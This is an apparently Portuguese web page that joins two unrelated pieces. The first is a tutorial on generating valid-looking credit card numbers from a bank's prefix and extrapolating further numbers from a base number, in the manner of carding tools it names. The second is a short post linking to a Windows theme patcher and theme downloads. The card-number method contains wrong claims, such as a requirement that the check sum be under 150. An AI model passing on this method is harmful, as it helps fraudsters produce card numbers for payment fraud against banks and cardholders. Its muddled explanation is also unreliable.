#Fazer cartão de credito#Este texto é dirigido mais a programadores que algum dia sonharam em desenvolver um prog do tipo do Cmaster ou Credit Wizard. Muitos textos tentam explicar o algoritmo usado para a elaboracao de numeros de cc's mas nenhum e' realmente completo ou explica como extrapolar varios numeros apartir de um numero base. Chega de falar merda e vamos ao que interessa.Para compreender melhor esse esquema vamos usar um numero correto(claro, ficticio) de um cc qualquer: 4128 7541 3218 0366. Usaremos esse numero durante toda a primeira parte do texto. Os quatro primeiros digitos de um cartao de credito indicam o banco a que pertence o cartao. No nosso número exemplo os quatro primeiros números sao '4128'. Estes digitos indicam um cartão do banco CITIBANK. Obvio que um banco nao vai possuir so um grupo de quatro digitos e sim varios(tipo... o citibank tem o 4128, 4013, 4271, 4556...). Ok, o primeiro numero do cc indica o seu tipo. Os principais sao:3 = American Express 4 = Visa 5 = MasterCard 6 = DiscoverNo nosso caso o cartao e' um belo VISA (numero 4). Agora repare em todos os digitos que ocupam posicao impar no cartao: 4128 7541 3218 0366 posicao: 1 3 5 7 9 11 13 15Cada numero que ocupa posicao impar no numero do cartao deve ser multiplicado por dois. Se o resultado dessa multiplicacao for menor que nove deixe como esta e passe para o numero seguinte. Se o o resultado for maior que nove, subtrai-se nove do resultado obtido. Nos numeros de po- sicao par nao e' necessario qualquer esquema.No nosso exemplo:4 * 2 = 8 ; oito1 = 1 ; posicao par2 * 2 = 4 ; quatro8 = 8 ; posicao par7 * 2 = 14 ; 14 > 9, portanto, 14 - 9 = 5 5 = 5 ;posicao par 4 * 2 = 8 ;oito1 = 1 ; posicao par3 * 2 = 6 ; seis 2 = 2 ; posicao par1 * 2 = 2 ; dois8 = 8 ; posicao par0 * 2 = 0 ; zero3 = 3 ; posicao par6 * 2 = 12 ; 12 > 9, portanto, 12 - 9 = 36 = 6 ; posicao parOk! O resultado que obtemos apos fazer esse esquema foi:8148 5581 6228 0336Agora faca a soma de todos os numeros obtidos:8+1+4+8 + 5+5+8+1 + 6+2+2+8 + 0+3+3+6 = 70Paulada! Se o resultado da soma for multiplo de 10 e tambem for menor que 150, pode ficar tranquilo, o numero e' totalmente valido. Repare no nosso numero exemplo: 70 e' multiplo de 10 e e' menor que 150 (ohhh!) Conclui-se que o numero de cc que usamos como exemplo e' um numero VISA valido pertencente ao Citibank (codigo 4128). Beleza! Mas com este esquema e' possivel apenas verificar se um cartao e' realmente valido, o que nao e' uma grande ajuda. Porem, vamos agora gerar um numero tendo por base apenas o codigo do banco.Vamos gerar, por exemplo, um cartao VISA do citibank:4271 ???? ???? ????Escolhemos mais 11 numeros (tem que ser 11 e nao 12), aleatorios entre 0 e 9:4271 0614 8230 113?O passo seguinte e' tornar este numero um numero de cc valido. Como? Usando aquele simples processo de verificacao que esplicamos acima.Novo numero: 8251 0624 7260 216? Fazendo a soma obtemos:8+2+5+1 + 0+6+2+4 + 7+2+6+0 + 2+1+6+? = 52 Porra, 52 e' menor que 150 mas nao e' multiplo de 10, entao, o numero deste cartao nao e' valido, correto? Nahh, ainda podemos validar este numero. Como? Se ainda temos um digito para colocar no numero certamente colocaremos um numero que torne o cartao valido. No caso o numero e' 8. O numero do cartao valido ficaria: 4271 0614 8230 1138OK! Temos um numero de cartao valido gerado com numeros aleatorios, mas corretamente validado. Agora vamos extrapolar, ou seja, obter outros nu- meros apartir de um numero base. O nosso numero e' 4271 0614 8230 1138. Primeiramente escolhemos os numeros que queremos manter:4271 0614 8230 1138==> Concluimos que voce e' esperto o bastante para deixar pelo menos o codigo do banco.Numeros mantidos: 4271 0614 ???? ????Bem, agora o processo e' escolher outros numeros aleatorios entre 0 e 9 para formar o numero, lembrando que o ultimo digito deve ser deixado em branco para validarmos o numero apos terminado o esquema.

टेम्स प/ PC

temas p/ pc
Temas p/ o seu pc.Quer deixar o tema do seu windows assim?http://i219.photobucket.com/albums/cc159/timagot/imagemdesk.jpgou assim!http://i219.photobucket.com/albums/cc159/timagot/imagem-1.jpgou de mtos geitos!Simples!baixe esse programa:uxpatcher!http://www.4shared.com/file/27166917/3fa15d32/uxpatcher.html?s=1Instalação!feche tudo! todas as janelas tudo msm!click sobre o programa de YES em tudo ai seu pcvai reiniciar...coloque os temas em : C:\WINDOWS\Resources\Themes(alguns temas nem precizam mais pra q tudo rode perfeitamente é melhor por ai)click no tema e pronto! Mac+Windows Vista= VistOSX.Excelente visual style com mistura de Vista mais Mac_OSDownload VistOSXhttp://www.deviantart.com/download/32889225/25 temas tdos funcionando 100%http://www.4shared.com/file/13243449/1cfce52f/25_Themes_Style_Vista_For_Windows_Xp.html?s=1